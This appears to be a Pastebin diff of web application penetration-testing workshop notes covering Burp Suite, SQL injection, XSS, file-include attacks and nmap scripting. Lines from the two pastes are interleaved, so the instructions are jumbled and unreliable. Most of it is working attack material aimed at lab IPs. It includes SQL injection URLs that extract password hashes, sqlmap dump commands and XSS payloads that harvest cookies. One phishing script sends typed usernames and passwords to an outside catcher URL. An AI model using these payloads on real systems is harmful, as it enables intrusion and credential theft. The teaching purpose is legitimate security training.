View difference between Paste ID: <a href="/qZN9MUe2">qZN9MUe2</a> and <a href="/mPaYKDtu">mPaYKDtu</a> - Pastebin.com

View difference between Paste ID: qZN9MUe2 and mPaYKDtu

SHOW: | | - or go back to the newest paste.

#######################
# Burp Suite Workshop #
# Norway AppSec Class #
#######################
 
 
 
#################
# Passive Recon #
#################
 
- Wikipedia Page
    - Are they Public or Private?
    - Does the target have any subsidiaries?
 
- Robtex
    - Show system map
 
- Netcraft
    - http://toolbar.netcraft.com/site_report
 
- Passive Recon (Firefox Add-on)
 
- Example OSINT Report to review:
https://s3.amazonaws.com/infosecaddictsfiles/OSINT_Innophos_11242010.doc

 
 
Let's start with some manual testing against 45.77.162.239

##################################
# Basic: Web Application Testing #
Start here:

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/

-----------------------------------------------------------------------

 
There's no parameter passing on the home page so the answer to question 1 is NO.

There is however a search box in the top right of the webpage, so the answer to question 2 is YES.

 
Try an XSS in the search box on the home page:

---------------------------Paste this into Firefox-----------------------------------

<script>alert(123);</script>

-------------------------------------------------------------------------------------

        - If yes - try SQL Injection
Doing this gives us the following in the address bar:

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/BasicSearch.aspx?Word=<script>alert(123);</script>

-------------------------------------------------------------------------------------

    3. Does the page reference a file?
Ok, so that XSS attempt didn't work - we'll cover more of this later.

 
Let's move on to the search box in the left of the page.
Let's start with some manual testing against 45.63.104.73
 
Let's give the newsletter signup box a shot

#######################
Moving on to the login page.

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/login.aspx

-------------------------------------------------------------------------------------

http://45.63.104.73/
I entered a single quote (') for both the user name and the password. I got the following error:

 
Let's try throwing a single quote (') in there:

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2'

-------------------------------------------------------------------------------------

    - Found parameter passing (answer yes to question 1)
I get the following error:

 
Unclosed quotation mark after the character string ''.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

 
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
 
 
 
In order to perform union-based sql injection - we must first determine the number of columns in this query.
We do this using the ORDER BY
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
 
Page returns the following error:
Unknown column '100' in 'order clause'
#########################################################################################

# SQL Injection                                                                         #

# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx            #

#########################################################################################

 
Page returns the following error:
- Another quick way to test for SQLI is to remove the parameter value

 
 
#############################

# Error-Based SQL Injection #

#############################

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

 
http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
 
 
 
#############################

# Union-Based SQL Injection #

#############################

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 order by 100--

http://45.77.162.239/bookdetail.aspx?id=2 order by 50--

http://45.77.162.239/bookdetail.aspx?id=2 order by 25--

http://45.77.162.239/bookdetail.aspx?id=2 order by 10--

http://45.77.162.239/bookdetail.aspx?id=2 order by 5--

http://45.77.162.239/bookdetail.aspx?id=2 order by 6--

http://45.77.162.239/bookdetail.aspx?id=2 order by 7--

http://45.77.162.239/bookdetail.aspx?id=2 order by 8--

http://45.77.162.239/bookdetail.aspx?id=2 order by 9--

http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
 
    We are using a union select statement because we are joining the developer's query with one of our own.

    Reference:

    http://www.techonthenet.com/sql/union.php

    The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.

    It removes duplicate rows between the various SELECT statements.

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
    Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
    Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--

 
########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
- Another way is to see if you can get the backend to perform an arithmetic function

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=(2)

http://45.77.162.239/bookdetail.aspx?id=(4-2)  

http://45.77.162.239/bookdetail.aspx?id=(4-1)

 
 
- This is some true/false logic testing

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--

http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
# File Handling Attacks #
http://45.77.162.239/bookdetail.aspx?id=1*1

http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#

http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
http://45.63.104.73/showfile.php?filename=about.txt
http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--

http://45.77.162.239/bookdetail.aspx?id=2 &0#

-------------------------------------------------------------------------------------

See if you can read files on the file system:
-- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
We call this attack a Local File Include or LFI.
http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--

http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
Now let's find some text out on the internet somewhere:
http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
---------------------------------------------------------------------------------------

 
Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
###############################
http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
# Blind SQL Injection Testing #

###############################

Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

###############################################################################
3 - Total Characters

---------------------------Paste these one line at a time into Firefox-----------------------------------
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx             #
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)

 
1. Use Firefox to browse to the following location:
Let's go for a quick check to see if it's DBO

---------------------------Paste this into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--

-------------------------------------------------------------------------------------

Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

 
D  - 1st Character

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--  

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)

 
    This should pop-up an alert window with your message in it proving XSS is in fact possible.
B - 2nd Character

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

   
    <script>alert(document.cookie)</script>
O - 3rd Character

---------------------------Paste these one line at a time into Firefox-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      

http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds

 
This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
 
 
5. Now view the stolen cookie at:
##########
    http://45.63.104.73/xss_practice/cookie_stealer_logs.html
# Sqlmap #

##########

If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:

---------------------------Type This-----------------------------------

cd ~/toolz/sqlmap-dev/

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -b

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --dbs

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump

python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords

------------------------------------------------------------------------

 
Use Firefox to browse to the following location:
 
    http://45.63.104.73/xss_practice/
 
 
 
Paste this in the search box
---------------------------Paste this into Firefox-----------------------------------

 
-------------------------------------------------------------------------------------

 
<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
---------------------------Paste this into Firefox-----------------------------------

</script>
-------------------------------------------------------------------------------------

 
Now view the stolen cookie at:
    http://45.63.104.73/xss_practice/passwords.html
 
---------------------------Paste this into Firefox-----------------------------------


-------------------------------------------------------------------------------------  

 
 
 
 
#########################
# Setting up Burp Suite #
#########################
Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
---------------------------Paste this into Firefox-----------------------------------

Download the latest free version of Burp at https://portswigger.net/burp/freedownload
-------------------------------------------------------------------------------------

Be sure to download the appropriate version for your computer system/OS.
 
Make sure that  burpsuite_free_v1.7.27.jar is set as executable (chmod +x burpsuite_free_v1.7.27.jar) and then run:
 
java -jar burpsuite_free_v1.7.27.jar
 
---------------------------Paste this into Firefox-----------------------------------

    - Click the "Options" sub tab
-------------------------------------------------------------------------------------  

    - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
    - In the same pop up make sure that the bind port is 8080
    - In the same pop up select the “Certificate” tab
    - Ensure that burp is configured to "generate CA-signed per-host certificates"
 
Open Firefox
---------------------------Paste this into Firefox-----------------------------------

    - Click “Preferences"
-------------------------------------------------------------------------------------

    - Click the "Network" sub tab
    - Click the connection "settings" button
    - Click "manual proxy configuration"
        set it to 127.0.0.1 port 8080
        check "Use this proxy server for all protocols"
---------------------------Paste this into Firefox-----------------------------------

 
-------------------------------------------------------------------------------------

Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
 
Unknown column '12' in 'order clause'

 
On the “This Connection is Untrusted” screen, click on “Add Exception”
---------------------------Paste this into Firefox-----------------------------------

 
-------------------------------------------------------------------------------------

 
Click "Export" and save the certificate as "BurpCert" on the Desktop.
 
Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
Go to Edit | Preferences
Click “Advanced” and go to “Certificates” tab
Click “View Certificates”
 
Click "Import" and select the certificate file that you previously saved.
 
---------------------------Paste this into Firefox-----------------------------------

 
-------------------------------------------------------------------------------------

 
 
 
 
 
###############################################################
-------------------------------------------------------------------------------------

###############################################################
 
Step 1: Automated Testing
 
Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
---------------------------Paste these one line at a time into Firefox-----------------------------------

- Run two (2) authenticated vulnerability scans against the target with admin privileges
 
The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
 
A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
 
 
Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
------------------------------------------------------------------------------------- -------------------

When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
 
 
Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
 
 
Also, be sure to save the scan results and logs. I usually provide this data to the customer.
 
 
 
Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
 
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx            #

 
Step 2: Manual Testing
 
Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
 
    ---------------------------Paste this into Firefox-----------------------------------

Save the spider and scan results. I usually provide this data to the customer as well.
    -------------------------------------------------------------------------------------

 
Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
 
Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
 
Here is what I mean:
    ---------------------------Paste this into Firefox-----------------------------------

 
    -------------------------------------------------------------------------------------

 
http://www.site.com/page.aspx?parametername=[ payload ]
 
You need to ensure that you send the payload this way, and like this below:
 
http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
 
    ---------------------------Paste this into Firefox-----------------------------------

 
    -------------------------------------------------------------------------------------

 
 
 
 
 
###########################################
    ---------------------------Paste this into Firefox-----------------------------------

###########################################
    -------------------------------------------------------------------------------------

 
Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
 
 
Step 1: Ask yourself the 3 questions per page of the site.
   ---------------------------Paste this into Firefox-----------------------------------

   http://45.63.104.73/xss_practice/cookie_stealer_logs.html

   -------------------------------------------------------------------------------------  

Step 3: When you load your fuzz strings - use the following decision tree
 
    - Are the fuzz strings causing a default error message (example 404)?
        - If this is the case then it is most likely NOT vulnerable
 
    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass
 
 
    - Are the fuzz strings causing an error message that discloses the backend type?
        - If yes, then identify DB type and find correct syntax to successfully exploit
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parenthesis
            (5-1)       <----- See if you can perform an arithmetic function
 
---------------------------Paste this into Firefox-----------------------------------

    - Are the fuzz strings rendering executable code?
-------------------------------------------------------------------------------------  

        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
Option 1

--------

---------------------------Paste this into Firefox-----------------------------------

 
 
 
 
-------------------------------------------------------------------------------------  

-------------------------------------------------------------------------------------------
 OWASP Top 10 Video Explanations
---------------------------Paste this into Firefox-----------------------------------

Burp Suite Reference:
-------------------------------------------------------------------------------------  


A1: Injection Vulnerabilities
Option 2
https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
--------

-------------------------Paste this into Firefox-----------------------------------

A2: Broken Authentication and Session Management
username=prompt('Please enter your username',' ');
https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2
password=prompt('Please enter your password',' ');

document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
A3: Cross Site Scripting (XSS)
https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4
-------------------------------------------------------------------------------------  

A4: Insecure Direct Object Reference
https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5


http://45.63.104.73/xss_practice/username_password_logs.html
A5: Security Misconfiguration
https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj


A6: Sensitive Data Exposure
#########################################
https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8
# Let's try a local file include (LFI)  #

#########################################

- Here is an example of an LFI
A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
- Open this page in Firefox:
https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
-------------------------Paste this into Firefox-----------------------------------

http://45.63.104.73/showfile.php?filename=contactus.txt
A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
-------------------------------------------------------------------------------------
https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10
 
 
- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)

- Here you see a direct reference to a file on the local filesystem of the victim machine.

- You can attack this by doing the following:

-------------------------Paste this into Firefox-----------------------------------


-------------------------------------------------------------------------------------
In order to collaborate with the other students on your homework you must signup with your Gmail account using the following Google form:
https://goo.gl/forms/Ou5yi0VhbLJZBufg2

- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
Filling out this form will give you access to the Google Drive folder where the class homework is contained.
- somewhere else on the Internet. Here is an example of a text file on the web:

-------------------------Paste this into Firefox-----------------------------------

http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

-------------------------------------------------------------------------------------

Here is a good reference for how to install and configure Burp Suite:
- Now we can attack the target via RFI like this:
https://nvisium.com/blog/2014/01/10/setting-up-burpsuite-with-firefox-and/
-------------------------Paste this into Firefox-----------------------------------

http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt

-------------------------------------------------------------------------------------
Create a step by step walk-through that details how to install and configure burp suite in Windows, and in Linux.
Team 1: Windows
Team 2: Linux

###############################

# How much fuzzing is enough? #

###############################

Day 2 Homework:
---------------
Here is a good reference of how to use Burp to look for OWASP Top 10 vulnerabilities:
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
 
 
Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
Team 1: http://45.63.104.73/
Team 2: http://54.245.184.121/
 
 
 
---------------------------------------------------------------------------------------------------------







#########
# Day 3 #
#########

yum -y update

yum -y groupinstall 'Development Tools'

yum -y install nmap bind-utils vim


cd ~

mkdir toolz

cd ~/toolz
 
wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
 
gcc ipcrawl.c -o ipcrawl
 
chmod 777 ipcrawl
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
 
gcc propecia.c -o propecia

chmod 777 propecia
 
cp propecia /bin

cd ~/toolz/

./ipcrawl 148.87.1.1 148.87.1.254  

nmap -sL 148.87.1.0-255

nmap -sL 148.87.1.0-255 | grep oracle

dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk



#################################################
# Screenshotting the Web Servers in the Network #
#################################################
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/
 
 
wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
cd wkhtmltox/bin/
cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
 
 
cd ~/toolz/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
 
cp http-screenshot.nse /usr/share/nmap/scripts/
     
 
nmap --script-updatedb
     
cd ~/toolz/
propecia 10.250.100 80 >> temp
strings temp >> labnet-ip-list.txt 
 
cd ~/toolz/labscreenshots/
nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.250.100.0/24 -iL /root/toolz/labnet-ip-list.txt
     
 
 
 
----------------------------------------- 
vi screenshots.sh
 
#!/bin/bash
printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
----------------------------------------- 
 
 
 
 
sh screenshots.sh
 


python -m SimpleHTTPServer
 
 
--- Now browse to the IP of your Linux machine on port 8000 (http://10.250.100.157:8000/labnet-port-80-screenshots.html):
http://CentOS-VM-IP:8000/labnet-port-80-screenshots.html


##########################
# Nmap NSE tricks to try #
##########################
nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.250.100.0/24
     
 /sbin/iptables -F
nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.250.100.0/24


nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.250.100.0/24
     
 
nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.250.100.0/24
     
    
 
nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.250.100.0/24
     
 
nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.250.100.0/24
     
 



#####################################
# Writing Your Own Nmap NSE Scripts #
#####################################
 
 
----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
-- The Rule Section --
portrule = function(host, port)
    return port.protocol == "tcp"
            and port.number == 80
            and port.state == "open"
end
 
-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443
 
 
 
 
 
 
----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
 
-- The Rule Section --
portrule = shortport.http
 
 
-- The Action Section --
action = function(host, port)
    return "Norway rocks!"
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse .com -p 22,80,443
 
 
 
 
 
 
 
OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
 
----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
    return response.status
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
 
 
----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
http://45.77.162.239/
action = function(host, port)
 
Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Homework.docx)
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
************************ Class Challenge ************************
        return response.body
    end
Let's see how you do with someone else's vulnerable website. Your 1st target is: http://zero.webappsecurity.com

end
Here are some sample web app penetration test reports from other companies that you can look at:
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
#############################

# Tricky stuff to play with #

#############################

 
 
 
 
----------------------------------------------------------------------
###################
vi /usr/share/nmap/scripts/intro-nse.nse
# Nikto with Burp #

# in Linux        #
-- The Head Section --
###################
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
rm -rf nikto*
-- The Rule Section --
portrule = shortport.http
git clone https://github.com/sullo/nikto.git Nikto2

-- The Action Section --
cd Nikto2/program
action = function(host, port)
 
perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
-----------------

Masking the Nikto header reference:
    if ( response.status == 200 ) then
http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
        return title
    end
 
end
----------------------------------------------------------------------
 
- Ok, now that we've made that change let's run the script
nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
 
 
 
 
 
 
 
----------------------------------------------------------------------
vi /usr/share/nmap/scripts/intro-nse.nse
 
-- The Head Section --
local shortport = require "shortport"
local http = require "http"
local string = require "string"
 
-- The Rule Section --
portrule = shortport.http
 
-- The Action Section --
action = function(host, port)
 
    local uri = "/installing-metasploit-in-ubunt/"
    local response = http.get(host, port, uri)
 
    if ( response.status == 200 ) then
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
 
        if (title) then
            return "Vulnerable"
        else
            return "Not Vulnerable"
        end
    end
end
 
----------------------------------------------------------------------
 
